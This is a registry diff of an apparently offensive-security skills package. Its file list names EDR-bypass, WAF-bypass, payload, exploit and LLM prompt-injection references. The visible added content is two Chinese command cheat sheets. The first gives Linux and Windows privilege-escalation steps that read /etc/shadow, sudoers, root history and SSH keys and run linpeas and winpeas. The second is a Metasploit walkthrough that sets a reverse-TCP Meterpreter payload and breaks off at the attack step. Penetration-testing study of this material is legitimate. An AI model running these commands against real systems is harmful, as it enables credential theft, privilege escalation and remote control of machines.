opencode-skills-collection 4.0.43 → 4.0.44
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +47 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1214 -2
|
@@ -0,0 +1,168 @@
|
|
|
1
|
+
# 权限提升
|
|
2
|
+
|
|
3
|
+
_3 条工具命令_
|
|
4
|
+
|
|
5
|
+
### Linux提权命令 `linux-privilege`
|
|
6
|
+
_Linux系统提权常用命令_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 获取系统版本信息
|
|
10
|
+
_platform: linux_
|
|
11
|
+
```
|
|
12
|
+
uname -a
|
|
13
|
+
cat /etc/issue
|
|
14
|
+
cat /etc/*-release
|
|
15
|
+
cat /proc/version
|
|
16
|
+
```
|
|
17
|
+
|
|
18
|
+
**Step 0**
|
|
19
|
+
> 获取用户信息
|
|
20
|
+
_platform: linux_
|
|
21
|
+
```
|
|
22
|
+
id
|
|
23
|
+
whoami
|
|
24
|
+
w
|
|
25
|
+
last
|
|
26
|
+
cat /etc/passwd
|
|
27
|
+
cat /etc/shadow
|
|
28
|
+
```
|
|
29
|
+
|
|
30
|
+
**Step 0**
|
|
31
|
+
> 查找SUID权限文件
|
|
32
|
+
_platform: linux_
|
|
33
|
+
```
|
|
34
|
+
find / -perm -4000 -type f 2>/dev/null
|
|
35
|
+
find / -perm -u=s -type f 2>/dev/null
|
|
36
|
+
```
|
|
37
|
+
**语法解析:**
|
|
38
|
+
- `-perm -4000` — SUID权限位 _parameter_
|
|
39
|
+
- `-type f` — 文件类型 _parameter_
|
|
40
|
+
|
|
41
|
+
**Step 0**
|
|
42
|
+
> 查看SUDO权限配置
|
|
43
|
+
_platform: linux_
|
|
44
|
+
```
|
|
45
|
+
sudo -l
|
|
46
|
+
cat /etc/sudoers
|
|
47
|
+
```
|
|
48
|
+
|
|
49
|
+
**Step 0**
|
|
50
|
+
> 查找可写目录
|
|
51
|
+
_platform: linux_
|
|
52
|
+
```
|
|
53
|
+
find / -writable -type d 2>/dev/null
|
|
54
|
+
find / -perm -222 -type d 2>/dev/null
|
|
55
|
+
```
|
|
56
|
+
|
|
57
|
+
**Step 0**
|
|
58
|
+
> 搜索内核漏洞
|
|
59
|
+
_platform: linux_
|
|
60
|
+
```
|
|
61
|
+
searchsploit linux kernel $(uname -r)
|
|
62
|
+
./linux-exploit-suggester.sh
|
|
63
|
+
```
|
|
64
|
+
|
|
65
|
+
**Step 0**
|
|
66
|
+
> 查看计划任务
|
|
67
|
+
_platform: linux_
|
|
68
|
+
```
|
|
69
|
+
cat /etc/crontab
|
|
70
|
+
ls -la /etc/cron*
|
|
71
|
+
crontab -l
|
|
72
|
+
```
|
|
73
|
+
|
|
74
|
+
**Step 0**
|
|
75
|
+
> 查看环境变量
|
|
76
|
+
_platform: linux_
|
|
77
|
+
```
|
|
78
|
+
env
|
|
79
|
+
set
|
|
80
|
+
echo $PATH
|
|
81
|
+
```
|
|
82
|
+
|
|
83
|
+
**Step 0**
|
|
84
|
+
> 查找敏感文件
|
|
85
|
+
_platform: linux_
|
|
86
|
+
```
|
|
87
|
+
cat /root/.bash_history
|
|
88
|
+
cat ~/.ssh/authorized_keys
|
|
89
|
+
cat /etc/shadow
|
|
90
|
+
find / -name "*.key" 2>/dev/null
|
|
91
|
+
```
|
|
92
|
+
|
|
93
|
+
**Step 0**
|
|
94
|
+
> 检测Docker环境
|
|
95
|
+
_platform: linux_
|
|
96
|
+
```
|
|
97
|
+
cat /proc/1/cgroup
|
|
98
|
+
fdisk -l
|
|
99
|
+
capsh --print
|
|
100
|
+
```
|
|
101
|
+
|
|
102
|
+
---
|
|
103
|
+
|
|
104
|
+
### WinPEAS `winpeas-tool`
|
|
105
|
+
_Windows提权辅助工具_
|
|
106
|
+
|
|
107
|
+
**Step 0**
|
|
108
|
+
> 执行完整提权扫描
|
|
109
|
+
_platform: windows_
|
|
110
|
+
```
|
|
111
|
+
winpeas.exe
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**Step 0**
|
|
115
|
+
> 快速扫描模式
|
|
116
|
+
_platform: windows_
|
|
117
|
+
```
|
|
118
|
+
winpeas.exe fast
|
|
119
|
+
```
|
|
120
|
+
|
|
121
|
+
**Step 0**
|
|
122
|
+
> 显示详细命令输出
|
|
123
|
+
_platform: windows_
|
|
124
|
+
```
|
|
125
|
+
winpeas.exe cmd
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
**Step 0**
|
|
129
|
+
> 保存扫描结果
|
|
130
|
+
_platform: windows_
|
|
131
|
+
```
|
|
132
|
+
winpeas.exe > output.txt
|
|
133
|
+
```
|
|
134
|
+
|
|
135
|
+
---
|
|
136
|
+
|
|
137
|
+
### LinPEAS `linpeas-tool`
|
|
138
|
+
_Linux提权辅助工具_
|
|
139
|
+
|
|
140
|
+
**Step 0**
|
|
141
|
+
> 执行完整提权扫描
|
|
142
|
+
_platform: linux_
|
|
143
|
+
```
|
|
144
|
+
./linpeas.sh
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
**Step 0**
|
|
148
|
+
> 自动发现模式
|
|
149
|
+
_platform: linux_
|
|
150
|
+
```
|
|
151
|
+
./linpeas.sh -a
|
|
152
|
+
```
|
|
153
|
+
|
|
154
|
+
**Step 0**
|
|
155
|
+
> 检查密码策略
|
|
156
|
+
_platform: linux_
|
|
157
|
+
```
|
|
158
|
+
./linpeas.sh -P
|
|
159
|
+
```
|
|
160
|
+
|
|
161
|
+
**Step 0**
|
|
162
|
+
> 保存扫描结果
|
|
163
|
+
_platform: linux_
|
|
164
|
+
```
|
|
165
|
+
./linpeas.sh > output.txt
|
|
166
|
+
```
|
|
167
|
+
|
|
168
|
+
---
|
|
@@ -0,0 +1,445 @@
|
|
|
1
|
+
# 漏洞利用
|
|
2
|
+
|
|
3
|
+
_11 条工具命令_
|
|
4
|
+
|
|
5
|
+
### Metasploit `metasploit`
|
|
6
|
+
_渗透测试框架_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 启动Metasploit控制台
|
|
10
|
+
_platform: linux_
|
|
11
|
+
```
|
|
12
|
+
msfconsole
|
|
13
|
+
```
|
|
14
|
+
|
|
15
|
+
**Step 0**
|
|
16
|
+
> 搜索相关漏洞模块
|
|
17
|
+
_platform: linux_
|
|
18
|
+
```
|
|
19
|
+
search exploit apache
|
|
20
|
+
```
|
|
21
|
+
**语法解析:**
|
|
22
|
+
- `search` — 搜索命令 _command_
|
|
23
|
+
- `exploit` — 模块类型 _value_
|
|
24
|
+
- `apache` — 搜索关键词 _value_
|
|
25
|
+
|
|
26
|
+
**Step 0**
|
|
27
|
+
> 选择要使用的模块
|
|
28
|
+
_platform: linux_
|
|
29
|
+
```
|
|
30
|
+
use exploit/multi/handler
|
|
31
|
+
```
|
|
32
|
+
**语法解析:**
|
|
33
|
+
- `use` — 使用模块命令 _command_
|
|
34
|
+
- `exploit/multi/handler` — 模块路径 _value_
|
|
35
|
+
|
|
36
|
+
**Step 0**
|
|
37
|
+
> 显示模块配置选项
|
|
38
|
+
_platform: linux_
|
|
39
|
+
```
|
|
40
|
+
show options
|
|
41
|
+
```
|
|
42
|
+
**语法解析:**
|
|
43
|
+
- `show` — 显示命令 _command_
|
|
44
|
+
- `options` — 配置选项 _value_
|
|
45
|
+
|
|
46
|
+
**Step 0**
|
|
47
|
+
> 设置模块参数
|
|
48
|
+
_platform: linux_
|
|
49
|
+
```
|
|
50
|
+
set RHOSTS 192.168.1.100
|
|
51
|
+
```
|
|
52
|
+
**语法解析:**
|
|
53
|
+
- `set` — 设置参数命令 _command_
|
|
54
|
+
- `RHOSTS` — 目标主机参数 _parameter_
|
|
55
|
+
|
|
56
|
+
**Step 0**
|
|
57
|
+
> 设置攻击载荷
|
|
58
|
+
_platform: linux_
|
|
59
|
+
```
|
|
60
|
+
set PAYLOAD windows/meterpreter/reverse_tcp
|
|
61
|
+
```
|
|
62
|
+
**语法解析:**
|
|
63
|
+
- `PAYLOAD` — 载荷参数 _parameter_
|
|
64
|
+
- `windows/meterpreter/reverse_tcp` — 反向TCP连接的Meterpreter载荷 _value_
|
|
65
|
+
|
|
66
|
+
**Step 0**
|
|
67
|
+
> 执行攻击
